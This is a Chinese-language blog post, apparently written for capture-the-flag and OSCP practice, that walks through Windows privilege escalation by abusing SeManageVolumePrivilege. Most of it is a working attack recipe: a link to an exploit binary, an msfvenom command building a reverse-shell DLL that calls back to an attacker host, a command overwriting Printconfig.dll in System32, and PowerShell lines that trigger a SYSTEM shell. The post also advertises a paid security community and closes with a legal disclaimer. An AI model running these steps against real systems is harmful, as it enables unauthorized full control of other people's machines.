“ SeManageVolumePrivilege提权手法”
看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网,渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。
01
—
winodws提权
打windows靶机的时候,如果你的权限里面有
SeManageVolumePrivilege 这个,那么可以使用这个姿势提权:
知识链接:https://github.com/CsEnox/SeManageVolumeExploit
1.下好这个EXP:
https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe
2.在kali上生成dll文件:(根据具体情况改,但是dll的名字别换)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.x.x LPORT=6666 -f dll -o Printconfig.dll
3.将SeManageVolumeExploit.exe,Printconfig.dll上传到靶机
4.运行SeManageVolumeExploit.exe
运行这个脚本后,你应该有写入C盘的权限
5.移动Printconfig.dll到目标位置:
move .\Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll
#这里可能存在同名的dll,直接覆盖就好了
6.依次运行下面两行代码:
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
查看kali监听端口应该已经有shell弹回连了
更多精彩内容请扫码关注“重生者安全”星球
免责声明:
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助
第十二条: 国家保护公民、法人和其他组织依法使用网络的权利,促进网络接入普及,提升网络服务水平,为社会提供安全、便利的网络服务,保障网络信息依法有序自由流动。
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,煽动颠覆国家政权、推翻社会主义制度,煽动分裂国家、破坏国家统一,宣扬恐怖主义、极端主义,宣扬民族仇恨、民族歧视,传播暴力、淫秽色情信息,编造、传播虚假信息扰乱经济秩序和社会秩序,以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。
第十三条: 国家支持研究开发有利于未成年人健康成长的网络产品和服务,依法惩治利用网络从事危害未成年人身心健康的活动,为未成年人提供安全、健康的网络环境。